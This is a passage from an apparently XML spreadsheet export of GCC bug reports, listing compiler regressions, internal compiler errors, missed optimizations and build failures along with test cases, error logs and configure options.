/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4854:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 8)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4856:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 16)
             ^
/mnt/scratch/gcc-4.10-20140420/gcc/machmode.h:183:32: error: invalid conversion from 'int' to 'machine_mode' [-fpermissive]
        ? mode_size_inline (MODE) : mode_size[MODE]))
                                ^
/mnt/scratch/gcc-4.10-20140420/gcc/config/sparc/sparc.c:4858:13: note: in expansion of macro 'GET_MODE_SIZE'
    else if (GET_MODE_SIZE (i) == 32)
             ^
make[3]: *** [sparc.o] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir410/gcc'
make[2]: *** [all-stage1-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir410'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir410'
make: *** [bootstrap] Error 2
The previous weekly snapshot 4.10-20140413 bootstrapped fine.
Looks similar to PR60876 except that one was in the rs6000 backend.
Configuration options:
/mnt/scratch/gcc-4.10-20140420/configure --prefix=/mnt/scratch/install410 --with-gmp=/home/mikpe/pkgs/linux-sparc64/gmp-5.1.3 --with-mpfr=/home/mikpe/pkgs/linux-sparc64/mpfr-3.1.2 --with-mpc=/home/mikpe/pkgs/linux-sparc64/mpc-1.0.2 --enable-multilib --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=cadac++fortran --build=sparc-unknown-linux --target=sparc-unknown-linux --with-cpu=ultrasparc --enable-targets=all --disable-libsanitizer</t>
  </si>
  <si>
    <t>GCC-52243</t>
  </si>
  <si>
    <t>Avoid reallocation for:  array1 = array1 / scalar  for performance</t>
  </si>
  <si>
    <t>Some testing with -Wrealloc-lhs (PR 52196) showed that it is rather common to encounter the following code.
gfortran inserts a reallocation check - but as the same array is on the LHS and on the RHS the LHS must be allocated with the correct shape is the same. Hence no reallocation check should be inserted (missed optimization):
        nablamat=nablamat*hescale
         kpoints=kpoints/scale                                
      hreal=hreal/cmplx(real(nkpts)0.0)
    y2 = y2 + y
      ylm = conjg( ylm )
      phasusbmat=conjg(phasusbmat)
      cc = det * transpose(cc)</t>
  </si>
  <si>
    <t>GCC-3904</t>
  </si>
  <si>
    <t>STL does not use ::operator new as required in standard</t>
  </si>
  <si>
    <t xml:space="preserve">	ISO C++ standard states that by default STL containers use
	std::allocator to obtain memory. std::allocator in turn is required to
	use ::operator new and ::operator delete. However STL in GCC
	specifically detects the use of std::allocator and uses malloc() in
	this case (this behaviour comes from the SGI STL code base). This
	breaks programs which override the default ::operator new and
	::operator delete.
	I understand the need for customised dynamic memory handling
	(which its own free memory lists etc) in STL
	because it increases performance. However even these kinds of
	optimisations should use ::operator new instead of malloc() so that
	they don't break the standard.
Release:
3.0
Environment:
System: Linux mustikkakukko.cs.tut.fi 2.4.5 #1 Tue May 29 19:53:48 EEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0/configure --host=athlon-pc-linux-gnu --prefix=/usr/local/gcc-3.0 --enable-shared --enable-threads --with-cpu=athlon --enable-cpp</t>
  </si>
  <si>
    <t>matti.rintala</t>
  </si>
  <si>
    <t>GCC-27754</t>
  </si>
  <si>
    <t>Stack overflow in gcj</t>
  </si>
  <si>
    <t>Compile the attached file with
gcj -c -findirect-dispatch parser.class -O2
This compiles successfully with gcc 4.1 although it consumes a lot of memory.
With 4.2 it fails with a stack overflow.</t>
  </si>
  <si>
    <t>GCC-13037</t>
  </si>
  <si>
    <t>[3.3 regression] [gcse-lm] g77 generates incorrect code</t>
  </si>
  <si>
    <t>I've discovered a bug (incorrect code generation) in g77 from gcc-3.3.2 
bug symptom: zeta(kkzc) seems to reference to zeta(kkzc-1) instead 
with gcc-3.2.2 it is OK so it is a regression. 
      subroutine bug1(expnt) 
      implicit none 
      double precision zeta 
      common /bug1_area/zeta(3) 
      double precision expnt(3) 
      integer k kkzc 
      kkzc=0 
      do k=13 
         kkzc = kkzc + 1 
         zeta(kkzc) = expnt(k) 
      enddo 
c     the following line activates the bug 
      call bug1_activator(kkzc) 
      end 
full bug1.f source is in attachment</t>
  </si>
  <si>
    <t>smelkov</t>
  </si>
  <si>
    <t>GCC-49318</t>
  </si>
  <si>
    <t>[4.7 Regression] 177.mesa in SPEC CPU 2000 failed to build</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 174742 gave:
gcc -c -o get.o   -DSPEC_CPU2000_LP64         -O3 -funroll-loops -ffast-math -fwhole-program -flto=jobserver -fuse-linker-plugin  get.c
get.c: In function 'gl_GetDoublev':
get.c:903:6: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
specmake[3]: *** [get.o] Error 1
Revision 174656 is OK.</t>
  </si>
  <si>
    <t>GCC-3203</t>
  </si>
  <si>
    <t>GCC-33101</t>
  </si>
  <si>
    <t>[DR 577] allow typedefs for void in empty parameter list</t>
  </si>
  <si>
    <t>This C++ test case works with gcc 4.1.1.  With gcc 4.2 and with mainline it gets an inexplicable error.
typedef void v
typedef v (*pf)(v)
foo.cc:2: error: â€˜â€™ has incomplete type
foo.cc:2: error: invalid use of â€˜vâ€™</t>
  </si>
  <si>
    <t>GCC-31836</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: 27_io/basic_istream/extractors_arithmetic/char/12.cc execution test</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/./gcc/g++ -shared-libgcc -B/test/gnu/gcc
/objdir/./gcc -nostdinc++ -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v
3/src -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.3.0/hppa64-hp
-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/include -i
system /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/sys-include -g -O2 -D_GLIBCX
X_ASSERT -ffunction-sections -fdata-sections -fmessage-length=0 -g -O2 -DLOCALED
IR=. -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/inclu
de/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/i
nclude -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/libstdc++-
v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util /test/gnu/gc
c/gcc/libstdc++-v3/testsuite/27_io/basic_istream/extractors_arithmetic/char/12.c
c    -include bits/stdc++.h ./libtestc++.a  -lm   -o ./12.exe    (timeout = 600)
PASS: 27_io/basic_istream/extractors_arithmetic/char/12.cc (test for excess erro
rs)
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir/hppa64
-hp-hpux11.11/./libstdc++-v3/src/.libs::/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/o
bjdir/hppa64-hp-hpux11.11/./libstdc++-v3/src/.libs
Assertion failed: is.fail() file /test/gnu/gcc/gcc/libstdc++-v3/testsuite/27_io
/basic_istream/extractors_arithmetic/char/12.cc line 57
FAIL: 27_io/basic_istream/extractors_arithmetic/char/12.cc execution test
extra_tool_flags are:
  -include bits/stdc++.h</t>
  </si>
  <si>
    <t>GCC-7412</t>
  </si>
  <si>
    <t>[DR 106] References to references</t>
  </si>
  <si>
    <t>The C++ standard in its wording prohibits
reference-to-reference types but this is subject to DR 106 
(unfortunately not yet in ready state so someone may want 
to suspend this bug report for the time being). Since it is
so simple to create situations where this hurts badly (see
attached example) I thought I'd file a report for this.
Regards
  Wolfgang
Here's the test case:
-----------------------------------------
#include 
void foo (const int 
int main () {
  std::bind2nd (std::ptr_fun (
}
-----------------------------------------
The error messages are lengthy but the essence is that you 
cannot bind reference arguments to functions even if they
are constant although I think that would be a perfectly
reasonable idea if the object you want to bind is largish
or cannot be copied.
Release:
unknown
Environment:
every gcc version up to 2002/07/17 at least</t>
  </si>
  <si>
    <t>GCC-31748</t>
  </si>
  <si>
    <t>[4.2/4.3 regression] bad diagnostic for invalid private clause</t>
  </si>
  <si>
    <t>A bad diagnostic is issued on mainline and the 4.2 branch for the following
code snippet (compile with -fopenmp):
========================
struct A
void foo()
{
#pragma omp parallel private(A)
}
========================
bug.cc: In function 'void foo()':
bug.cc:5: error: '#'type_decl' not supported by dump_expr#' is not a variable in clause 'private'</t>
  </si>
  <si>
    <t>GCC-21825</t>
  </si>
  <si>
    <t>[4.0 Regression] 2D array initialization with reshape</t>
  </si>
  <si>
    <t>The following code causes segmentation fault with gfortran
PROGRAM TST
  CHARACTER(2) PARAMETER :: ETYPE(22) = &amp;
       RESHAPE((/ 'a1''b1''a2''b2' /)(/22/))
END PROGRAM TST
&gt; gfortran4 -c tst.f90
tst.f90:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt;</t>
  </si>
  <si>
    <t>GCC-2648</t>
  </si>
  <si>
    <t>gcc invents #include causing infinitely nested header files</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
snapshoot dated 2002-04-23
Environment:
Latest release of cygwin on Windows NT V4.0 SP6a
How-To-Repeat:
configure the snapshot and make the resulting Makefile.</t>
  </si>
  <si>
    <t>knyblad</t>
  </si>
  <si>
    <t>GCC-40566</t>
  </si>
  <si>
    <t>[4.3 Regression] rejects promoted throw</t>
  </si>
  <si>
    <t>void f(int x) { char c = x ? 23 : throw bla }
error: aggregate value used where an integer was expected
because we call convert_to_integer on the throw_expression.</t>
  </si>
  <si>
    <t>GCC-4759</t>
  </si>
  <si>
    <t>Cannot build gcc-3.0.2</t>
  </si>
  <si>
    <t xml:space="preserve">	Compiler segfaults during build process. Command output and preprocessed 
source incldued.
Release:
3.0.2
Environment:
System: Linux sarkovy.koeller.org 2.4.13 #5 Mon Oct 29 20:33:37 CET 2001 i686 
unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/thomas/src/gnu/gcc-3.0.2/configure --prefix=/usr 
--host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --enable-shared 
--with-gnu-as --with-gnu-ld --enable-threads=posix 
--enable-version-specific-runtime-libs --enable-languages=c c++
How-To-Repeat:
	Configure and build using attached shell script 'conf-gcc'.</t>
  </si>
  <si>
    <t>GCC-47190</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: in function_and_variable_visibility at ipa.c:934 with static weakref variable</t>
  </si>
  <si>
    <t>This might be a known problem but bugzilla search didn't return any results
----- testcase.c -----
static int i __attribute__ ((weakref))
----------------------
Compiler output:
$ gcc testcase.c
testcase.c:1:1: internal compiler error: in function_and_variable_visibility at ipa.c:934
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x11b8518 /usr/portage/distfiles/svn-src/gcc/trunk/gcc/ipa.c line=934 
    function=0x11b86e0 function_and_variable_visibility) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/diagnostic.c:892
#1  0x0000000000b1c477 in function_and_variable_visibility (whole_program=0 '\000')
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/ipa.c:933
#2  0x00000000007f1e56 in execute_one_pass (pass=0x163cd00) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1553
#3  0x00000000007f258a in execute_ipa_pass_list (pass=0x163cd00)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1920
#4  0x0000000000af9d81 in ipa_passes () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1722
#5  cgraph_optimize () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1794
#6  0x0000000000af9fda in cgraph_finalize_compilation_unit ()
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1042
#7  0x0000000000509d6c in c_write_global_declarations () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/c-decl.c:9843
#8  0x00000000008db9e6 in compile_file (argc=12 argv=0x7fffffffdaf8)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:591
#9  do_compile (argc=12 argv=0x7fffffffdaf8) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:1874
#10 toplev_main (argc=12 argv=0x7fffffffdaf8) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:1937
#11 0x00007ffff6586bbd in __libc_start_main () from /lib/libc.so.6
#12 0x00000000004f0955 in _start ()
Tested revisions:
r168535 - crash
4.5 r168062 - crash
4.4 r168062 - OK</t>
  </si>
  <si>
    <t>GCC-49687</t>
  </si>
  <si>
    <t>[4.6 Regression][avr] Missed optimization for widening MUL</t>
  </si>
  <si>
    <t>With avr-gcc 4.6.1 and 
-Os -mmcu=atmega88 -S -dp
int mul8_55 (char x)
{
    return x * 55
}
gets compiled to 
mul8_55:
	ldi r25lo8(55)	   7	*movqi/2	[length = 1]
	muls r24r25	   8	mulqihi3	[length = 3]
	movw r24r0
	clr r1
	ret	   26	return	[length = 1]
which is fine.  If the constant is 126 however the result is bloated and might be related to PR36467 i.e. MUL* is better than shift.
mul8_126:
	clr r25	   7	extendqihi2/1	[length = 3]
	sbrc r247
	com r25
	movw r18r24	   28	*movhi/1	[length = 1]
	lsl r18	   33	*ashlhi3_const/2	[length = 2]
	rol r19
	lsr r25	   34	*ashlhi3_const/5	[length = 5]
	mov r25r24
	clr r24
	ror r25
	ror r24
	sub r24r18	   12	subhi3/1	[length = 2]
	sbc r25r19
	ret	   31	return	[length = 1]
If the constant is 155 a MUL is invented but a widening MUL would be smarter:
mul8_155:
	mov r20r24	   6	extendqihi2/2	[length = 4]
	clr r21
	sbrc r207
	com r21
	ldi r18lo8(155)	   7	*movhi/4	[length = 2]
	ldi r19hi8(155)
	mul r20r18	   8	*mulhi3_enh	[length = 7]
	movw r24r0
	mul r20r19
	add r25r0
	mul r21r18
	add r25r0
	clr r1
	ret	   26	return	[length = 1]</t>
  </si>
  <si>
    <t>GCC-27397</t>
  </si>
  <si>
    <t>[4.2 regression] ICE on invalid template argument</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on mainline:
=============================
template struct A
=============================
bugA.cc:1: error: expected `)' before '&gt;' token
bugA.cc:1: internal compiler error: tree check: accessed elt 1 of tree_vec with 0 elts in get_innermost_template_args at cp/pt.c:490
Please submit a full bug report [etc.]
A similar testcase causes an ICE in a different function:
=============================
template struct A
{
    template struct B
}
A a
=============================
bugB.cc:3: error: expected `)' before '&gt;' token
bugB.cc: In instantiation of 'A':
bugB.cc:6:   instantiated from here
bugB.cc:3: internal compiler error: tree check: accessed elt 1 of tree_vec with 0 elts in add_outermost_template_args at cp/pt.c:459
Please submit a full bug report [etc.]
The second testcase also ICEd before GCC 3.4.0.</t>
  </si>
  <si>
    <t>GCC-18524</t>
  </si>
  <si>
    <t>mklibgcc.in mishandles MULTILIB_OSDIRNAMES</t>
  </si>
  <si>
    <t>When multilibs are being used but MULTILIB_OSDIRNAMES is not set (for example 
with --target=powerpc-linux) the generated libgcc.mk contains rules that don't 
create its target.  In the case of powerpc-linux this is the rule for 
nof/libgcc_s_nof.so which actually creates libgcc_s_nof.so (without the 
directory prefix).  The result is that the file is always rebuilt.</t>
  </si>
  <si>
    <t>GCC-56814</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Bogus Interface mismatch in dummy procedure</t>
  </si>
  <si>
    <t>The following code compiles with ifort and gfortran 4.5 to 4.7. With 4.8 and 4.9 it fails with:
Error: Interface mismatch in dummy procedure 'fun' at (1): PROCEDURE POINTER mismatch in function result
However to me the interfaces look the same.
Reported at comp.lang.fortran by Macro Restelli https://groups.google.com/forum/?fromgroups=#!topic/comp.lang.fortran/rfoD-brnIqI
module m1
 abstract interface
  pure function i_f(x) result(d)
   real intent(in) :: x(::)
   real :: d(size(x1)size(x2))
  end function i_f
 end interface
 procedure(i_f) pointer :: f =&gt; null()
end module m1
module m2
contains
 pure subroutine ns_dirdata(fun)
  interface
   pure function fun(x) result(d)
    real intent(in) :: x(::)
    real :: d(size(x1)size(x2))
   end function fun
  end interface
 end subroutine ns_dirdata
end module m2
program p
 use m1
 use m2
  call ns_dirdata(f)
end program p</t>
  </si>
  <si>
    <t>GCC-66267</t>
  </si>
  <si>
    <t>I got the following segmentation fault from the following code:
..\calcGrades.cpp:32:3: internal compiler error: Segmentation fault
   }
   ^
#include  
#include 
#include 
#include 
using namespace std
struct grades
	 {
		 string firstName
		 string lastName
		 int 	ID
		 int	prgmGrades[10]
		 int	examGrades[3]
		 int	fexamGrade
		 double finalGrade
	 }student
 double calculatePercentGrade(const grades person)
  {
	 int total = 0
	 double pAvg eAvg fAvg final
	 for(int i = 0 i &lt; 10 i++)
		 total += person.prgmGrades[i]
	 pAvg = total/10
	 total = 0
	 for(int i = 0 i &lt; 3 i++)
			 total += person.examGrades[i]
	 eAvg = total/3
	 fAvg = person.fexamGrade
	 final = (pAvg * 0.3) + (eAvg * 0.45) + (fAvg * 0.25)
	 return final
  }
  char calculateLetterGrade(const double percent)
  {
	 if(percent &lt; 60)
		 return 'F'
	 else if(percent &lt; 70)
		 return 'D'
	 else if(percent &lt; 80)
		 return 'C'
	 else if (percent &lt; 90)
		 return 'B'
	 else
		 return 'A'
  }
 int main()
 {
	 ifstream fin(gradeBook.txt)
	 char letterGrade
	 cout &lt;&lt; This program reads a data file of student grades calculates the \n
		  &lt;&lt; final grade and displays the studentâ€™s name and final grade.\n\n\n
	 cout &lt;&lt;            Final Grades \n\n
	 while(!fin.eof())
	 {
		 fin &gt;&gt; student.firstName &gt;&gt; student.lastName &gt;&gt; student.ID
		 for(int i = 0 i &lt; 0 i++)
			 fin &gt;&gt; student.prgmGrades[i]
		 for(int i = 0 i&lt; 3 i++)
			 fin &gt;&gt; student.examGrades[i]
		 fin &gt;&gt; student.fexamGrade
		 student.finalGrade = calculatePercentGrade(student)
		 letterGrade = calculateLetterGrade(student.finalGrade)
		 cout &lt;&lt; student.firstName &lt;&lt; ' ' &lt;&lt; student.lastName  &lt;&lt; \t\t
			  &lt;&lt; letterGrade &lt;&lt; '\n'
	 }
	return 0
 }</t>
  </si>
  <si>
    <t>cjedic</t>
  </si>
  <si>
    <t>GCC-42537</t>
  </si>
  <si>
    <t>[PATCH] misc spelling fixes</t>
  </si>
  <si>
    <t>Misc spelling fixes (found when running the debian lintian tool)</t>
  </si>
  <si>
    <t>GCC-6741</t>
  </si>
  <si>
    <t>Re: -dM -M -o file.i doesn't work (test gcc.dg/cpp/cmdlne-dM-M.c)</t>
  </si>
  <si>
    <t xml:space="preserve"> On Tue May 21 2002 at 12:20:54AM +1000 Billinghurst David (CRTS) wrote:
 &gt; The test still fails on irix6.5 and cygwin.
 &gt; 
 &gt; spawn /usr/local/obj/gcc/gcc/xgcc -B/usr/local/obj/gcc/gcc/ /usr/local/src/gcc/gcc/testsuite/gcc.dg/cpp/cmdlne-dM-M.c -dM -M -E -o cmdlne-dM-M.i  PASS: gcc.dg/cpp/cmdlne-dM-M.c (test for excess errors)
 &gt; FAIL: cmdlne-dM-M.c: #define line not printed
 And what does 
 /usr/local/obj/gcc/gcc/xgcc -B/usr/local/obj/gcc/gcc/ /usr/local/src/gcc/gcc/testsuite/gcc.dg/cpp/cmdlne-dM-M.c -dM -M -E -o cmdlne-dM-M.i
 actually print on cygwin (including \r please)?
 Is this the only test failing or are e.g.
 cmdlne-dD-dM.c and cmdlne-dM-dD.c failing too?
 	Jakub
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-40594</t>
  </si>
  <si>
    <t>[4.5 Regression] wrong-code</t>
  </si>
  <si>
    <t>The code I'm going to attach shows strange results with trunk but works as expected with 4.4. 
In short within a TYPE a LOGICAL component is initialized to .FALSE. (dummy_atom_init). The calling procedure (dummy_atom_model_init) that checks the same LOGICAL component sees it as .TRUE. immediately afterwards:
 dummy_atom_init F
 dummy_atom_model_init T
 dummy_atom_init F
 dummy_atom_model_init T
Obviously the component should be .FALSE. in the calling procedure as well.
The application this was extracted from fails with this kind of error since r147206.
It is interesting to note that valgrind does not report any issues?!</t>
  </si>
  <si>
    <t>GCC-18644</t>
  </si>
  <si>
    <t xml:space="preserve">[3.3/3.4 regression] -Wsynth warning in </t>
  </si>
  <si>
    <t>For the following simple program 
-------------------- 
#include  
int main () { 
  std::complex x 
  x = std::complex(10) 
} 
-------------------- 
I get this warning since 3.2: 
g/x&gt; /home/bangerth/bin/gcc-4*/bin/c++ -c x.cc -Wsynth 
x.cc: In function `int main()': 
x.cc:5: warning: using synthesized 'std::complex&amp; 
std::complex::operator=(const std::complex&amp;)' for copy 
assignment 
/home/bangerth/bin/gcc-4.0-pre/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0/complex:1193: 
warning:   where cfront would use 'std::complex&amp; 
std::complex::operator=(const std::complex&amp;) [with _Tp = double]' 
This is a regression against 2.95 in which no such warning was given. The 
warning is annoying since one can't really use  with -Werror. 
I see two ways around this annoying mis-feature: either -Wsynth shouldn't 
report anything for system/libstdc++ headers or (my preference) libstdc++ 
gets fixed up by adding the copy operator. The latter would clearly 
be allowed by the as-if rule. 
W.</t>
  </si>
  <si>
    <t>GCC-58198</t>
  </si>
  <si>
    <t>duplicate codes generated for variant function and base function</t>
  </si>
  <si>
    <t>Created attachment 30675
test case
This problem was fixed after g++ 4.4 I file this bug is only for book keeping.
test case was attached.
pirandello 1017&gt; nm a.out | grep mybase
0000000000400528 T _ZN6mybase10mybasefuncEv
000000000040054e T _ZN6mybaseC1Ev  &lt;=== base function
000000000040053a T _ZN6mybaseC2Ev  &lt;=== variant function
base function (_ZN6mybaseC1Ev) and variant function (_ZN6mybaseC2Ev) should have same addresses but they're not.
Use gdb to debug a.out shows bpt stop in variant function instead of base function:
(gdb) b mybase::mybase
Breakpoint 1 at 0x400542: file base.cc line 21. (2 locations)
(gdb) run
Starting program: /net/benjamin2.us.oracle.com/export/ws/jeanko/dinstall/maxirun/intel-Linux/pirandello-chko/results/Customlist_list.master.maxi/gplus_base.dbxgcc/a.out 
Breakpoint 1 mybase (this=0x7fff1343ed50) at base.cc:21
21        mybaseint = 5555 
(gdb) disassemb $pc
Dump of assembler code for function mybase:
0x000000000040053a :  push   %rbp
0x000000000040053b :  mov    %rsp%rbp
0x000000000040053e :  mov    %rdi-0x8(%rbp)
0x0000000000400542 :  mov    -0x8(%rbp)%rax
0x0000000000400546 : movl   $0x15b3(%rax)
0x000000000040054c : leaveq 
0x000000000040054d : retq   
End of assembler dump.
(gdb) 
# disassemble base function address shows both functions has exact same codes
(gdb) disassemb 0x40054e
Dump of assembler code for function mybase:
0x000000000040054e :  push   %rbp
0x000000000040054f :  mov    %rsp%rbp
0x0000000000400552 :  mov    %rdi-0x8(%rbp)
0x0000000000400556 :  mov    -0x8(%rbp)%rax
0x000000000040055a : movl   $0x15b3(%rax)
0x0000000000400560 : leaveq 
0x0000000000400561 : retq   
End of assembler dump.
(gdb)</t>
  </si>
  <si>
    <t>GCC-59044</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Internal compiler error triggers when accessing a typedef in a specialized member class</t>
  </si>
  <si>
    <t>Created attachment 31180
Preprocessor output
The following code triggers an internal compiler error when compiled with 'g++ bug.cpp' (the complete preprocessed file can be found in the attachment):
/* ---- bug.cpp --------------------------------------- */
template 
class C {
private:
    template 
    struct Implementation
    template 
    struct Implementation { typedef void Typedef }
public:
    typedef typename Implementation::Typedef Type
}
template class C
/* ---------------------------------------------------- */
The error message produced by g++ 4.8.1 (as found in the g++-4.8 package in the Ubuntu 13.10 repo see below for build information):
bug.cpp: In instantiation of â€˜class Câ€™:
bug.cpp:12:16:   required from here
bug.cpp:9:52: internal compiler error: in tsubst at cp/pt.c:11313
     typedef typename Implementation::Typedef Type
                                                    ^
This bug is still present in the gcc-snapshot package. However the code compiles fine in g++ 4.7.3 (as found in the g++-4.7 package).
Additional information:
GCC version: gcc version 4.8.1 (Ubuntu/Linaro 4.8.1-10ubuntu8) 
System type: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu8' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu</t>
  </si>
  <si>
    <t>GCC-44584</t>
  </si>
  <si>
    <t>[4.6 Regression] Invalid memory access with gfortran.dg/typebound_proc_15.f03</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 160858 gave
FAIL: gfortran.dg/typebound_proc_15.f03  -O  (internal compiler error)
FAIL: gfortran.dg/typebound_proc_15.f03  -O  (test for excess errors)
Revision 160826 is OK.</t>
  </si>
  <si>
    <t>GCC-47400</t>
  </si>
  <si>
    <t>Several UCN tests FAIL on Tru64 UNIX V5.1B and IRIX 6.5</t>
  </si>
  <si>
    <t>Several UCN tests partially fail on Tru64 UNIX V5.1B and IRIX 6.5. One common
example is
FAIL: gcc.dg/ucnid-10.c  (test for warnings line 7)
FAIL: gcc.dg/ucnid-10.c  (test for warnings line 8)
FAIL: gcc.dg/ucnid-10.c (test for excess errors)
Excess errors:
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/ucnid-10.c:7:9: warning: #pragma pack(pop Ã³) encountered without matching #pragma pack(push Ã³) [-Wpragmas]
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/ucnid-10.c:8:9: warning: unknown action 'Ã§' for '#pragma pack' - ignored [-Wpragmas]
Instead of being printed in \u... notation the characters are printed literally.
The set of failures isn't identical on both platforms (maybe due to char being
unsigned on IRIX but signed on Tru64 UNIX?) but the symptom is always the same.</t>
  </si>
  <si>
    <t>GCC-77479</t>
  </si>
  <si>
    <t>[7 Regression] Compile time hog w/ -O2 (-Os)</t>
  </si>
  <si>
    <t>(This issue was initially reported in PR72866.)
gcc 7.0.0-alpha20160821 and newer snapshots take large (or infinite?) time when compiling the following reduced snippet at -O2 or -Os:
void
vr (int of unsigned char bw)
{
  int d1
  int lm = 0
  for (d1 = 0 d1 &lt; 3 ++d1)
    {
      const int vl = 2
      while (bw &lt; vl)
        {
        }
      if (bw != vl)
        lm -= vl
    }
  while (++of &lt; 1)
    {
      lm /= bw
      of += lm
    }
}
7.0.0-alpha20160731 seems to be unaffected by this issue.</t>
  </si>
  <si>
    <t>GCC-82388</t>
  </si>
  <si>
    <t>[8 Regression] wrong code at -O1 and above on x86_64-linux-gnu in 32-bit mode</t>
  </si>
  <si>
    <t>This might be related to PR 82387 which only manifests in the 64-bit mode while this one only in the 32-bit mode. 
$ gcctk -v
Using built-in specs.
COLLECT_GCC=gcctk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20171001 (experimental) [trunk revision 253330] (GCC) 
$ 
$ gcctk -m32 -O0 small.c ./a.out echo $?
0
$ gcc-7.2.0 -m32 -O1 small.c ./a.out echo $?
0
$ 
$ gcctk -m32 -O1 small.c ./a.out echo $?
251
$ 
----------------------------------
struct A
{
  int b
  int c
  int d
} e
struct A g ()
{
  struct A h[30] = {{000}}
  return h[29] 
}
int main ()
{
  e = g ()
  return e.b 
}</t>
  </si>
  <si>
    <t>GCC-650</t>
  </si>
  <si>
    <t>freebsd4/gcc-20001017 cc1: Internal error: Segmentation fault</t>
  </si>
  <si>
    <t>make bootstrap ends with a ``cc1: Internal error: Segmentation fault''
when compiling tmp-dum.c which the stage1 compiled compiler
Release:
2.97
Environment:
System: FreeBSD angora 4.1-STABLE FreeBSD 4.1-STABLE #0: Fri Sep 22 18:38:42 MEST 2000 toor@angora:/usr/obj/usr/src/sys/biPIII i386
